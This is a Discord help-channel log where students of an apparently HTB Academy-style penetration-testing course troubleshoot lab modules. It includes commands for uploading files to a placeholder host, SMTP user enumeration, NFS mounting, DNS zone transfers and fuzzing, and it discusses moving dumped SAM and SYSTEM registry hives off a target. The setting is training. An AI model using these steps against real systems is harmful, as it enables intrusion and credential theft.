#modules

Has anybody had success with these commands using a WebDAV server? I spent so much time trying to figure out why they did not work for me just to ditch them for the following powershell command:

Invoke-RestMethod -Uri "http://{ip_addr}/{file_name_output}" -Method PUT -InFile {file_path}

hi. i think there's an issue with one of the modules. the shell and payloads one. the skill assessment seems to have at least two issues: 1) most of the time you can't spawn the target. you click and wait half an hour and still not target. 2) if you're lucky after several tries, host2 and host3 don't seem to work properly. each time you try to access blog.inlanefreight.local or upload a file on host3 you get a connection reset or timeout

issues happen whether through Firefox, Burp Suite browser or cURL

so it seems there's something wrong with the hosts

Are you using EU vpn?

lemme check

nah

US Academy 3

Might be stupid but maybe try running ftp.app? for some reason it shows on your machine as ftp.app instead of ftp there

nope not working

/usr/lib/apt/methods/ftp

i found the file path of it

its definetly there but the terminal just cant find it

thats weird

it should be in /usr/bin if its a binary

If you run sudo apt install ftp does it tell you that its already installed?

ok just checked through the search and it seems that A LOT of people are having those timeout issue. is that module still working actually?

maybe try a PATH abuse ;))

i did it just doesnt work

/usr/lib/apt/methods/ftp -p 10.129.158.192
100 Capabilities
Send-URI-Encoded: true
Send-Config: true
Version: 1.0

it just pastes thisinstead of actually connnecting

i just use the path instead of ftp since it cant find it but the ftp itself as well doesnt work

im gonna start tweakin

i know why

im not connected to a vpn i just realised

switching to EU 2 to have a look

do i use udp or tcp

ftp -p 10.129.210.92
100 Capabilities
Send-URI-Encoded: true
Send-Config: true
Version: 1.0

just gives me this when i use ftp command

works

target spawned quickly. then pwned host2 in two minutes. so the last 5/6 hours spent were a network issue lol

the targets are still massively slow. but at least the exploits work and i can upload files

and finish the module zzz

good to know for the future

together with the ftp package you may need to install vsftpd and start/enable the service, then try to run again the ftp command.

/usr/lib/apt/methods/ftp -p 10.129.210.92
100 Capabilities
Send-URI-Encoded: true
Send-Config: true
Version: 1.0

just doesnt work jsut gives me this response all the time

also i installed vsftpd

how do i enable the service and check its enabled

can you just try to run ftp <ip>?

ye same response

strange, for me it works. Plus you need to get used to linux, better to start from the linux fundamentals module or you read the man pages.
EDIT: There is always google by the way in case you need it

i tried everything

cant find the aolution to get it working

If you have tried everything and it still doesn't work, try taking a break

https://tenor.com/view/yee-yeedinasour-dinasour-gif-4930781

module done. so, good to know. if someone gets some weird stuff not working in the future, seems that changing VPN may help. thanks

ive tried everything

idk why it doesnt wanna ftp connect

Try with the workstation provided in academy instead

ye that will prob work

but i wanna get it fixed on this crappy system

How did you install the OS and how did you install ftp?

Trying to use the PUT method to change the data from london to flag, what did I do wrong? |||||||||||||| curl -X PUT http://83.136.251.211:55760/api.php/city/london -d '{"city_name":"flag", "country_name":"osaekhada"}' -H 'Content-Type: application/json'

vm?

It was directed to the guy who has problems with ftp, I'm curios if he installed it via live cd or a preinstalled vm

Hi, I'm currently on "Attacking Email Service" in the "Attacking Common Services" and the command: ||smtp-user-enum -M VRFY -U users.list -D inlanefreight.htb -t 10.129.203.12 || doesn't seem to be finding anything. It's attempts to finds any users, however comes back with zero. I deleted and redownloaded both users.list and smtp-user-enum. Restarted VM, tried new IP and nothing. Does anyone have any idea? I can send screenshots if needed, all it says is 0 results. I have tried to find the actual user in the user list to which they ARE in it, but I just want to actually do the lab.

ah

Are you completely sure VRFY is working fine? Double check and then see if you can use something else

I tried all 3 of them

dm you

kk

Look over the responses carefully. Don't rely on the response colors.

Wdym? It's all the same color lmao, I am just getting 0 results from the smtp command

Sorry. I just redid the footprinting module and ran into an issue, but you are on a different module. Ignore me.

all good

Got it to work; was the vpn I was using. Worked fine yesterday then broke today.

Also wait time

Smtp is a slow service

Nevermind im stupid i didnt escape it

just got the htb student monthly

Hello edgy dark humor skid

Read and follow #welcome and do active content on the main site

can anyone lend a helpful tip on this module, find through SPL searches against all data the password utilized during the PsExec activity. I feel that the first command in the module leads closer to finding the answer. although I feel like I'm missing one or two more steps to finding it

I feel that the other commands in the module are over complicating it

there's definitly a mistake on this module

https://academy.hackthebox.com/module/54/section/511

question ask for the full URL of the page that says 'You don't have access!' .. im on the webpage looking at the message, i copy that same URL into the answer field and says its incorrect...

nvm

it doesnt like that i specified the port instead replaced that with the word "port"

yep

that's exactly it

since it's a docker instance, the port isn't gonna be consistent

lol i was so confused

btw congrats on the community helper thing, well deserved

hello everyone

I'm doing the Windows Event Logs module. However, the RDP connection is not stable.

anyone can help me with this ?

i followed everything to the Tee but i can't get SedownloadPrivileges to work and be turned on

even the automation script doesnt work

same was happening with me try different EU VPNs

I am trying to setup ligolo and it says the interface is down?

Here are the commands I ran:

sudo ip link set ligolo up
ligolo-proxy -selfcert```

9: ligolo: <NO-CARRIER,POINTOPOINT,MULTICAST,NOARP,UP> mtu 1500 qdisc fq_codel state DOWN group default qlen 500
    link/none 

Is there any other commands I am supposed to run?

In password attacks, PtT Linux, i am stuck when escalating to julio

can someone nudge me?

I tried with a different VPN. Same problem. I tried directly on the pwnbox, it is not stable. I just waste my time!

the interface is up

run ligolo and it should work

omg yes its not just me

in another module i couldnt access ssh but i could with pwnbox

yes it is terrible

I have a problem with RPD connection

hopefully they fix this soon

but when I did some exercices with elasticsearch it was not stable too

ho ok so the problem is known

it si very frustrating

i dont know if its known

<@&861185840277487616>

dude omg

take this fellow down

[MaOS foundamentals] - Where are the Applications related to the system stored at?

i tried /Applications, Applications

and /app /app/data

it's looking for system apps, not normal user apps

should be /Applications path since system installed .app files live there

Thx

Is it just me or is the target hosts in academy super unstable currently

They seems to stop responding intermittently

I don't have a Mac so I'm having trouble answering the question

Idk I

Here you go https://infinitemac.org/2001/Mac OS 9.2.2

i wonder if that actually works lol. it might be a bit old.

that's pretty cool

you can just build a macos vm tho

it wouldn't be real red teaming without a little torture

https://discussions.apple.com/thread/492333?sortBy=best

@woven stone Try /System/Applications

hi guys, how can I find out which domain and smb server belongs to?

include the module and section when you ask here pls

and again one of the tools in the section will do it

oh sorry let me do that

module is "footprinting" and the section is "smb"

is it smbstatus?

Have you scanned the target?

yea

How have you enumerated the target?

I am working on the session hijacking section of the XSS module. I am trying to set up my listener on a seperate laptop. I have the htb vpn running on it. I used the command "ip a" to get my machines ip for the script, but eth0 shows that it is down. the ip addresses at lo and wlan0 did not work.

any tips on how to troubleshoot this?

yea

your eth0 is your wired nic, try the tun0 adapter which should be your vpn connection

@pine dune** How have**

oh sorry tired 😅 I did smb//<ip>

tun0 is not populating when I use ip a. i thought the one I needed was missing. Maybe i need to rerun the vpn

connected to the IP using smb

look at this

yeah if ip a didn't show tun0 (on kali) then it's not up. i think on parrotbox it's like ens1234 or whatever the numbers are

try re-downloading the vpn file from academy and reconnecting openvpn vpnfile.vpn & then you can close the window when it connects

@rustic sage

I mean there are tools taugh in the section, use them

smbclient is not the only tool

thx bro 🥰

@pine dune Go back over the module and look at the enumeration examples i.e. commands

thx 💖

okay thanks @next bronze and @rustic sage

NOT WORK haha

Did /System/Applications work

is the answer not in here? I am sure its in this image

does any of those say domain?

I think you should review the module and look at the commands

look at the commands in the section lol

Your answer is in the commands within the section

ahh my bad I thought it was asking server not domain 😅

The issue is, you're not testing and enumerating enough

okay ill try

can someone give me a clue?

yeah

We have twice

and i fou this

It's in the module notes Alpha, re-read it carefully

okay thanks

Is kail or parrot os better

as u like

whatever your preference is (kali is better)

haha 😅

the truth is they're both debian based and you can install whatever tool the other one doesnt' have pretty easily, it's literally preference

He is a fan of Kali Linux 🤸

Out of the box I prefer kali

but it's subjective

thanks @rustic sage and @next bronze found it 😄

<@&861185840277487616>

neither is necessarily better but kali comes with zsh installed

speaking of which, installing Parrot OS 6 HTB Edition has an issue with bash; every time you open it, it spits out garbage characters

real hackers use sh

You're not good at using it, admit it

what

Just kidding, you're right about that, but it's fast

Have you enumerated the shares you have access to with commands from the section?

I think so

i was able to figure out the vpn issue, but i still cant get a response on my listener. I am going to set it aside for now and try again later

@pine dune Look at the commands outlined in the section for rpcclient

There is a table that shows you one in particular you need here

okay thanks Ill check it when I come back from outside, I have to go outside for abit

hey guys
Still I am getting this error so many times

re-download the vpn (choose TCP), reconnect to the vpn with the new file, restart the victim machine, wait 5 mins, then try again

okay

and maybe switch VPN regions, i'm always hearing about how EU vpn has issues if you're on that

guys pls help here
from yesterday I am unable to move this file

maybe try copy instead, there are also a ton of other ways to xfer files

how to copy

the command is 'copy'

ok

An apt upgrade should fix it

yup. upgraded and reinstalled bash, no more garbage

just a bit annoying to figure out for the first time

I tried all possible methods but it didn't work

Perhaps you're not going back far enough

Are you asking me or telling me that's what you tried

thx

worked

Delete as spoiler then

:)

ok

. this too

has anyone else here done the vulnerability assessment module? I'm most of the way through it right now and I've been working on it for 11 days. I'm at the first nessus assessment and I will probably finish on Saturday because tomorrow and today I am booked.

I ought to reread the nessus stuff tho

everything you need is on the provided host [target] at https://ip:nessus_port/

and the creds are given to you to log into it

ok ya

ok thanks

unless you have a pivot, you're not scanning the internal network

just gotta find time to finish it

ok cool got it thanks. good to know

is OpenVAS assessment similar?

is it normal to take two weeks to complete something like this?

with 17 sections?

yes

they both have pre-compiled scans that will have all the information required to answer the questions

I did the math and the average module has 17 sections

so, if I complete 17 sections every two weeks I will complete the CPTS path in 11 months

is that normal?

there's no "normal"

if that's a pace you're comfortable with. then it's fine

if not then re-evaluate

ok got it thanks

it's as simple as that ¯_(ツ)_/¯

ya

ok thank you.

Learning is a skill in of itself, some are better at it than others as it's more practised

Rushing decreases retention rates, too slow wastes time

Just make sure to revisit things from time to time and you'll be fine

and to a degree "too slow" depends on the person

Yes

some people may only have time to set aside N hours of progress every day/week

it's just coming to terms with understanding that it will take longer overall

verify your account -> #welcome

nobody here that did the SAML part on academy?

Why do we use the word FUZZ after the end of files? Is it useful?

in what context

ffuf -u http://94.237.54.214:33139/FUZZ.php -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt:FUZZ

list:FUZZ <-

according to the documentation that shouldn't be required. i'm not sure why it's added.

so that it's easier to set up multiple fuzzers: FUZZ FUZZ1 etc

https://tenor.com/view/the-universe-tim-and-eric-mind-blown-mind-blown-meme-mind-explosion-mind-explosion-meme-gif-18002878

convention generally

it's to show that technically you can replace :FUZZ with anything like :SCAN

okay

(and replacing the FUZZ in the url with SCAN will perform the same task)

with multiple wordlists, it makes it easier to parse through

Thank you for a nice answer ❤️

In this
sam.save and security.save file moved and copied successfully but
system.save file getting network error again and again
Its because system.save file is much larger than other in size

So anyone knows how to transfer big files
any alternative method???

smb share, drive share via rdp

cme

that is smb share ya goon

how

naw that's a pic of the module

but ik what you mean, sharing the folder you save these to

how are you connected to the windows box

smb is usually pretty stable, are you using tcp vpn

through rdp

or is your smbserver cooked

what rdp client

yes

xfreerdp

add the flag /drive:/secret/weeb/folder

then when you open Explorer you'll see the drive connected under 'my computer'

probably the easiest way to xfer files

okay let me do

0%
since 5 mins

Is there anything I am mistaken

i'd probably reboot the victim host at this point, maybe your vm box/computer too and try again

your internet might be poopoo

use pwnbox?

^

Internet is very good

are you on wlan?

When I delete any file
It takes 0.4 to 1 seconds
But when I start copying it takes so long

Yes

wired will be more stable

wlan shouldn't make a difference

i've done a handful of content on WLAN just fine ¯_(ツ)_/¯

yeah it shouldn't but at this point it's either he needs to reboot the box/his stuff, or there is some kind of network problem going on

just curious if he considers "very good" internet over wifi

Yeah may be

because i don't

It's true
Internet is good

¯_(ツ)_/¯

i mean definitions can vary yeah

the other telltale sign is if you ping the box and get random spikes out of the norm

i.e. norm being 200 and you're getting like 16k ping spikes

You can try the pwnbox like Xre0us suggested, otherwise reboot the victim vm, reboot your computer, start it all up and try again (give the victim ~5 mins to spawn)

also download a new vpn, change regions to generate a new one

Sure
I am going on pwnbox

make sure to disconnect from the vpn if using the pwnbox

^

Okay

Hello 👋

https://tenor.com/view/kto-lbow-hi-hello-hi-there-gif-25347432

It's about 1 hour 25 minutes

https://tenor.com/view/i-dont-think-thats-right-seth-meyers-late-night-with-seth-meyers-that-doesnt-seem-right-i-think-youre-wrong-gif-20031736

it shouldn't take that long to transfer a 40MB file

what vpn region are you in?

i always hear bad things about eu region

(yes vpn region still affects even with pwnbox)

EU academy 1

maybe consider swapping to US or somewhere else for testing

US academy 3 has never let me down

really shouldn't be that slow

Then let me try this also
How boring is going on

Is this the fastest way to transfer file?

Smb is just the simplest

for the purposes of the lab i would say transfer methods are negligible in terms of speed

^

Also most cases a 40MB file will be negligible regardless of method

Which pwnbox location would be better?

i would try US

Ok

if another region and/or the pwnbox doesn't work, you should probably open a ticket with support via the website

successfully transferred through pwnbox
But I wanna know why my VM was too slow

did you change regions on top of using pwnbox

^

yes

it could be either the region or your box then

Vpn connection was the problem

yeah probably

but still pwnbox is faster then my VM

any tip you prefer to make my VM fast

More dedicated ram

i've seen virtual machines fail, kinda rare, but it's happened to me where stuff was just a little off and not working. a reboot of my main computer fixed it. you could always try rebooting and trying again if you really want to figure it out

it's a networking problem if file transfers are slow

But in seriousness it depends

I have provided 6.5 Gb RAM

How much does host have

1

?

well that's a problem

https://tenor.com/view/dedicated-ram-wam-super-kai64-gif-14754106

16

Ok that makes more sense

it's probably more something is going on with winsock or the vm's network stack

Also sometimes having too many cores allocated can cause issues

Parrot doesn't like more than like 4 I think

I run my parrot vm with 4GB ram and 2 cores

Though with my frankentop I'm surprised it just works

2c/4gb or 4c/8gb willl be enough

it's very likely not a resource issue with the vm

Yeah doesn't look to be the case

No one's really going to be able to directly pinpoint exactly what caused this, but again, reboot your entire box and try again and you may find it just works again. also keep in mind, you changed VPN regions, so it could still simply be that the region was the issue.

I have faced so many problems
but pwnbox has solved it because of its better performance

nothing wrong with using the pwnbox

Yep

Okay I understood

Ive reinstalled vms before and then they just work™️

Changing no settings

but there are so many tools given in modules which needed in real world
thats why I am using VM

reboot your pc, connect to us vpn, see if it works then

that's my advice if you want to continue troubleshooting

yeah
pwn would be better to use

And VPN changing matter

yes it does

does this work

Does anyone have problems starting the machines?

[NTLM RELAY ATTACKS - SKILLS ASSESSMENT]
Hey guys!
Currently working on skill assessment here and got stuck on second question.
Can I have a nudge?

I like the siem fundamentals course I finally understood how each component of ELK stack works as my only exposure was to splunk which already has everything integrated

Hi all, i'm working through "Introduction to Windows Evasion Techniques: Dynamic Analysis" and i'm using Micr0_Shell to generate the shell code but it's not giving me a shell back. I moved on to the Process Injection, and Notepad opens but again i don't get a shell back. I'm literally following everything step by step. Can someone check i'm not going insane and check if they get a shell back using Micr0_Shell
UPDATE: I tried again following the same steps the day after and it works

I need help with the Zap Fuzzer section. I don't know if Zap Fuzzer is already installed on my machine or if I would need to download Zap Fuzzer.

https://academy.hackthebox.com/module/110/section/1056

hey i need quick help, how do i remove this notification bar on top of my screen

Exams VPN Scheduled Maintenance us-academy-exams-1 this one

that's the neat part, you don't. you can probably do it through some browser editor or something

damn, when i fullscreen my inbuild terminal, i cannot remove it lol because the buttons disappear

yeah i use my own vm so i don't worry about that

nevermind

can anyone explain / give hint on this question

Foorprinting module SMB section

I have tried using rpcclient netsharegetinfo, but didnt get the solution

Banners

Hint: customized means not a default name like smbd or smbshare

But perhaps tied to a company name

got it, that was easy😂

Overlooked it?

yes

Hi, i'm stuck on https://academy.hackthebox.om/module/80/section/848
Broken Authentication:Skill Assessment - Broken Authentication
After some detect length of password i fond 2 passwords:
**
**

And use ||http://.../messages.php -X POST --data user=FUZZ&message=random&submit=submit||
found valid users:
||guest
support.it
support.uk
support.cn
support.gr
admin.cn
admin.us
admin.gr
admin.it||
obtained valid credential ||support.uk:*||
Nothing found in here
Understand logic of cookie:
but this didn't help too

hard to not spoiler anything, I'll dm you.
||Are you sure about the cookie?||

Depends on the logic. But you’re getting there

Year, I'm already closer but not enough.

Feel free to dm me if you need a nudge. Tell me what you know and I’ll see what I can do 🙂

||showmount -e 10.129.202.41 Export list for 10.129.202.41: /TechSupport (everyone)||

||sudo mount -t nfs -o rw,nolock 10.129.202.41:/TechSupport"/mnt/techsupport||

||ls -la /mnt/techsupport ls: cannot open directory '/mnt/techsupport': Permission denied||

I tried my best with searching up this problem, idk why it won't let me read or access the share

I somethink found new for my self. So may i will try more.

you need to use an option that doesn't lock it

or; just run around it as root

i think it's like norootsquash

thats what "-o rw,nolock" does no?

it's one of those odd things

it's an additional option

I see, so i should add that option in like "-o rw,nolock,norootsquash"

oh nvm

¯_(ツ)_/¯

i forget the way around it

most people just navigate with root/sudo

not even chatgpt4o could help me out here

just su to root or use sudo to grep/find

alright, will update

Hello I’m doing Linux fundamentals in htb academy and I’m ssh in to a mec Iv got all but 2 flags I need the What is the path to the htb-student’s Mail?
Which shell is specified for the htb-student user. Can anyone help talk me though it please give me a idea where to look I’m a complete noob the rest Iv found my self just them 2 are hard to come by

env

then you can search that list for MAIL and SHELL

note the MAIL directory may not actually exist on the filesystem

hi guys, can someone help me ?

which is the right channel to ask about a hint for a machine?

you mean on https://app.hackthebox.com/ ?

Thanks I’ll have a look at that now

yep

#boxes ; you'll need to read and follow #welcome to access it

What version of the SMB server is running on the target system? Submit the entire banner as the answer.

Is there an error in this question?

submit the ENTIRE banner

i solved it thank you

shiii, so I tried running grep on it, is there a way to make it just list out EVERYTHING in the mount? I did get some output but I am sure there is some way to just get an output of the contents of all the files in the mount share

Guys i'm stuck on HTB corporate machine, i have owned the workstation (10.9.0.4) but i'm stuck, i no see anyway to jump to other machines...

to speed things up; only one of those tickets has text

some tips please?

wrong channel still

#boxes again, you need to link your account following the instructions in #welcome

thx done

GL :)

Module: Attacking Enterprise Networks Section: Exploitation & Privilege Escalation

For anyone needing this, changing the VPN server was the fix for me!

Phishing section of XSS module:
The URL I made works fine when I test it on my end but when I go to the send.php page it's unable to send the URL. Anyone run into similar issues or may have an idea of what I may be overlooking ?

most people prefer to do the AEN blind

It makes sense, I just replied for a possible solution if anyone faced the same problem as me because I couldn't find a similar issue here

because most people are discouraged from asking for help on that module, as the module itself is the walkthrough

so if you're struggling, with the steps in front of you, it's generally not a good sign

Yes I can understand why, my problem was a weird one, me and the support were trying to look at the problem but a simple change of the vpn server was the fix

tends to be the simplest solutions to problems

:) and usually the first suggestion to try if you're sure you're doing it right

Hey, @west rampart does the Plan Feature - Monthly billing for Students, unlock the completed modules permanently once they are solved?

you keep all modules you 100% complete

also don't random @ staff lol

this question has been asked and answered dozens of times in here, #cwes #cpts #cdsa

how can i have access to chat in global ?

Thanks

read and follow #welcome

Hi, not sure if this is the right forum to ask this but does anyone know if there are any channels for the Blacksky cloud labs? Thanks in advance.

as Blacksky labs are enterprise only - no

will keep that in mind

Any hints on Attacking common services - Easy? Already done tons of enumeration, read documentation of XA* running on the server, tried what stated on FAQs, bruteforced ftp, smtp, rdp..., tried also with user f* I got enumerating... I think I may be getting crazy, suposed to be Easy hahahahahah

also, no anonymous accesses are allowed

You're likely just overthinking it

probably

There's a running service and placing files is easy

you mean on the service?

On a service

Which can further be used to just gain rce

i understand what you mean, but I have anonymous access to none, am I trippin?

I am trying to start the fuzzer for the Zap Fuzzer but don't know how to set the payload

" The directory we found above sets the cookie to the md5 hash of the username, as we can see the md5 cookie in the request for the (guest) user. Visit '/skills/' to get a request with a cookie, then try to use ZAP Fuzzer to fuzz the cookie for different md5 hashed usernames to get the flag. Use the "top-usernames-shortlist.txt" wordlist from Seclists. "

https://academy.hackthebox.com/module/110/section/1056

Hey, Im doing footprinting module and stuck on a question in the smb part

"Find additional information about the specific share we found previously and submit the customized version of that specific share as the answer. "

I know the share is called "sambashare" in the smb server but how do I go about answering this question?

You have creds, no?

If not then you haven't dug hard enough

I assumed I was missing something

Bruteforce creds can work

Use common password lists

the module itself provides both users and passwords, so will try that again

You found a user

f* is on the right track

thx

look for something that looks like a 'version', you probably have it in front of you

thanks...ill try

find through an analytics-driven SPL search against all data the source process images that are creating an unusually high number of threads in other processes. Enter the outlier process name as your answer where the number of injected threads is greater than two standard deviations above the average. Answer format: _.exe (any tips anyone can give out?

don't get crazy, it is a version as if i write "My Apache 2.2.2"

The password was not in the list provided. After 30 minutes of bruteforcing everything I asked myself 'should I try rockyou?'. Got it 5 seconds later🥵

im running a search exploit on an ip using msfconsole

but it just comes up with like 2000 exploits how am i meant to find a plugin one like im so confused

y

to discover the plugin, maybe look at the webpage

sometimes they're Simple

So basically a made up version by the user?

no?

im pretty sure u can find out via rpcclient command

Made up is also pretty loose

Ah Im a bit confused on this

if you customize a version, i.e. write in certain lines of code and deviate from the source code for updates

it is no longer the base version

Really? Ill check that once I get back home...currently on the bus rn for a talk

A lot of browsers are based off of chromium now

does that mean that Firefox is just a made up version of Chromium?

or Edge?

How exactly am I meant to find it, I mean what should I look out for in the smb server

i mean one of the enumerations in rpcclient says it to you

perhaps look for it's relation to a company

yeah man look at the rpcclient commands

Hmm okk

companysmb numbers

iirc is the format

you likely looked at it and disregarded it

when u go in rpcclient u can type help to view available commands

see which command could enum for smb

the commands needed are also shown in the section

no need to view the whole gamut of commands

LOL well the more you know

the easier modules tend to not just dump a tool on you and not at least give you some basic commands

Okay thanks guys ill try enumeration on rpc when i get back home tonight

👌

it's also in the banner when you connect to the smb server

oh i didnt know well that way is easier ig

simple and easy to overlook

most services tell you what version they are when you connect to them ¯_(ツ)_/¯

yeah i just go straight into looking rather then seeing the banner when u connect lol

could anyone lend some guidance towards this question "find through an analytics-driven SPL search against all data the source process images that are creating an unusually high number of threads in other processes. Enter the outlier process name as your answer where the number of injected threads is greater than two standard deviations above the average."

Remove blue payload.

on attacking common services medium is the machine going crazy or am I not supposed to log in through ssh? found valid credentials for user s* bruteforcing ssh itself xD, but cannot connect through console

nevermind 🙃 easy is clearly swapped with medium

tips on enumarating pop3 and imap services without any prior credentials?

currently running nmap brute-force scripts for hopefully more info

Got any more context? Like which module and section you're working on?

footprinting lab hard

AYO PAUSE

apologies

nvm I think i figured out what i need to do

Not the server for piracy. Also this channel is only for HTB Academy

hint being the "backup server"

bingo

Hi all, I'm working through "SQL Injection Fundamentals" and I'm noticing that the scenario described in the text isn't lining up with what I'm seeing when I connect to the server spawned at the end. Is that normal?

which part of sqli module u doing

specifically on the UNION clause part

Can anyone else confirm that sysmon.exe is broken on the "Analyzing Evil With Sysmon & Event Logs" section of the "WINDOWS EVENT LOGS & FINDING EVIL" mini module? (https://academy.hackthebox.com/module/216/section/2301)

Spawning the Windows target host, RDP'ing and then running sysmon.exe results in failure.

This is done having CMD being run as an administrator. No modifications were done to the XML file that comes with the VM.

can you describe more about your issue?

Yes, for example, within the text it says the following:

so entries from the ports table and the ships table were combined into a single output with four rows. As we can see, some of the rows belong to the ports table while others belong to the ships table.

😔 sorry, been a difficult week.

I don't see a database or tables that match up with what's being described here. Is that normal?

Like, the author is describing this from a 'hypothetical' example?

well what have u tried on the target to re-creat that sqli?

I'm just learning the union clause, I have a server to connect to and try it out

everything is an example

is it a practical example?

yup

should those tables be visible in the database that I connect to?

i dont think those specific tables, if u connected to a mssql or doing it via a sqli exploit it wont have the same database and tabes etc etc, its the method of how to use un-even columns with union clause

Got it. so it's more of a high level explanation. 👍 👍 Perfect! thank you!

yeah its just the method you have to understand

'method' was the word I was looking for. Thank you.

Thanks

#bot-commands +verify

@jolly cradle apparently @ everyone perms might be busted

oh its not allowed?

then why it said i can ping it

it got deleted automically i asked for help network

It doesnt actually ping it

Weird, I was receiving pings

maybe its just a glith lets move on

So Ig they were doing the ghost ping thing

Pain in the ass

anyways can i get neetwork to install viruses to understand the viruses and get rid of it challeng

You asked for viruses

Specifically

yes but i want network on

The answer will be no

it costs or what

is network expensive

I suggest you read the #rules

okay

This channel is for discussion and help with the htb academy modules

im so sorry sir ill read rules right now

I am having a problem cracking the password for the linux pass the hash for the linux01$ account I have root and the password hashes but after tring several dictionaries I can not get the password, can someone tell me if I am going in the right direction or help nudge me to where I need to be looking?

Why would you even ping everyone?

it looks aesthetically even if it's not working

Hey, so in this example they talk about how sometimes powershell is blocked, and the alternative may be to use a LOLBIN like for example the Intel Graphics Driver but they use it in the example... from PowerShell, so what do you actually do if powershell is blocked

Cmd?

Hello I have a question about the module Windows Event Logs

they did a sneaky with the ghost ping

I did the exercies but I have a question with the second

That's probably possible, although what would you do in case CMD is also not whitelisted

I was not able to filter correctly the log to isolates the good event

I tired to use this following XML but it seems the query is ignored

which module?

they meant powershell scripts i believe even then if powershell itself is blocked then u can use cmd

well you do have to change some modifications to the query info

like ID and such

I cant get inti my htb account lol

It is my full XML so I'm already filtering the good event ID (its works).

skill issue

well you also need to filter by userID

at least for the one section that has you start at logon events

also only one of those will show the right info

as 4907 is only one type of logged event

sorry LogonID*

could give me an example?

there's an example from the module, no?

yes but it is not complete

*[EventData[Data[@Name='SubjectLogonId']='0x3E7']]

Idk depends on what i have. Maybe another user has the priv to run em. Idk task scheduler or vsb, pretty sure metasploit would work too etc

i mean

it's partial, yes

but that should be enough to build off of

https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4907

SubjectLogonID is part of the Name Data field of the XML field of the event

looks like the ProcessName field would be what you use

or maybe ObjectName

since it gives you a path?

hello gyus Are your VPN files working? Even though I tell the VPN files one by one, they are not connecting.

yes

it works for me only RDP connection are not very stable

anyway thanks for your help. I will continue the exercise and maybe with other example and the practise I will understand how to use the XML filtering correctly

if you look at the link i sent regarding EID 4907; it shows the different fields in the DATA portions of the xml generated by the event

<Data Name='<name>'>(Actual Info)</Data>

for instance in the example the 0x3E7 is represented by <Data Name='SubjectLogonID'>0x3E7</Data>

you should be able to work backwards from there

Anyone else having issues connecting to targets? Specifically RDP sessions? Tried on PwnBox as well as my own. Tried renewing VPN connections and respawning target hosts...screen just sits on black til it eventually times out

press <enter>

Blackscreen +infinity | braincells 0

lol well i just needed your response Marcie....didn't even have to hit enter this last time i reloaded it

will do that next time though

yeah

can you tell you're not the first (nor likely the last)?

hahaha.....been trying to search the discord chat on questions prior to posting them but failed on that this time too

in:modules blank screen or in:modules black screen

yeah i just mean i failed to search before asking the question lol

np

the one thing i dislike about discord search is that it's not overall keyword search

it's verbatim search

so it'll look for "blank screen" but not "screen blank"

yeah not the best, could be worse....I've generally found enough past content not to bug you too much!

this channel is meant for asking questions ¯_(ツ)_/¯

sometimes all I do is a quick google query to answer stuff

i.e. finding the microsoft article about event ID 4907 and quickly scanning it to understand what data it's pulling for finding info

is it possible to decrypt a file without knowing the key?

You mean access a password protected file? Or you mean after a ransomware attack

Either way, not for this channel

Read and follow #welcome to access more of the server

ok which channel?

Well if you read and follow #welcome you can probably figure out for yourself which channel would be better for your question

Even #1024429874246590575 might be more appropriate

Maybe #forensics-cryptography

where i can find my (ACCOUNT_IDENTIFIER)😅

Man if only they told you exactly where in the instructions

Specifically in step 1

ok i didnt read the steps thanks bro😂

anyone else having issues reaching the web-pages on port 80 for the "documenting and reporting" labs ?

i can ping them and nmap shows them but a web browser or curl times out

this is cool https://discordapp.com/channels/473760315293696010/1232354387288920064/1241058362578436096 , but 500 cubes for mini module

The Password Attacks module has a couple of sections on cracking files. Hopefully his question was not related to that.

It's not

hi I am having trouble selecting a msfvenom payload is there a site like revshells that will do this hard work for me or a site with a guide for it?

anyone do this room

i can't connect no matter what i do

refresh VPN start a new connection nothing works

are u using xfreerdp to rdp into the target?

I am also having vpn problems :/

acting really slow

is xfreerdp actin up?

idk i was just asking if he was using it to rdp and if thats giving an issue then to use remmina tool and see if its alsp giving issues

im asking because rightnow all the linux rdp tools are being weird

they kick me out or they say invalid password when that password just worked

I am a part of domain admins but I cannot view reg key

I tried to use elevated powershell but there was no promt and no difference in whoami. I am currently netadm which is part of Domain Admins

have u tried to log out and log back in sometimes that will kick the perms to start in a new session

yea I tried closing the rdp session and logging back in

have u tried to query in cmd?

yes

which module u doing i assume the windows priv esc dns admin

yep

I tried going into admins folder to view the flag but I got the same permission denied

maybe uac is on, try to see if u can open a cmd not in powershell and right click on cmd and see if u can run as administrator

wait wait lol is the ip the same ip for your machine inside of your query? i just noticed that.

you mean the target ip?

yup

we need to provide the foothold ip right?

yup just wanted to see if u did that correct but u did. idk why its giving u access denied

yes I guess now I will try reseting the target

yeah man sorry wish i know why

no issue bro thanks for trying

if I remove the ip it works maybe because its local

and when restarting dns it runs without the cleanup step required

logging out from the account using start did the trick

Hi, how can I get the fqdn of an ip address?

u can use dig

dig followed by ip address?

dig any ip address

ok thanks

it should have been explained on the dns module u doing rn

I think it did somewhere but theres too much info 😅

yeah thats how its gonna be thats why u take notes and review back on the section to see where u can possibly find the answer even if that means re-reading the whole section again

okay thanks

yeah man but if u need any more help always got u

thanks bro

Rdesktop

try using a diff tool instead

Hi, I used this command to try and find the TXT record in zone transfer

i saw there was a root.inlanefreight.htb sub domain

what can I do with this to access the TXT record 😅

maybe u can zone transfer with root.inlanefreight.htb

I tried that

to this day i still dont really understand zone transfers and how to do them good

That's not a subdomain

oh what is it?

That's admin email

ohh

The records don't like @

So it's replaced with a .

ahh

Look up soa records

that root.inlanefreight.htb is part of the SOA record

^

well damn

dns my weakspot lol

this is a bit complicated 😅 tbf

how can I access the TXT record pls

Look at all the subdomains in the axfr

ok hold on

if its in a A record its a sub domain right

Sometimes

I'm just using subdomain loosely here

what is A record?

ahh i saw it

returns an IPv4 address of the requested domain as a result.

https://www.cloudflare.com/learning/dns/dns-records/dns-a-record/

@fathom pendant can I post an image?

just wanted to clear this up since we on the topic of dns zone transfer. if u see the subdomains once u zone transfered like how he is doing dig axfr inlanefreight.htb @10.129.176.215 and u want to zone transfer like internal.inlanefreigth.htb u need to add it to the /etc/hosts?

I added it to etc hosts

You don't need to add anything to /etc/hosts for this

yeah lol just no spoilers thats it

Don't forget proper spelling

i dont think its a spoiler but okay ill go ahead

there are 3 TXT under SOA

Handful of subdomains to dig through

okay so same command but replace the dns name with the subdomain?

dig axfr subdomain @target_ip

ok thx ill try that

Domain name* not dns name

my bad

im just reviewing everything before i take the aen blindly lol

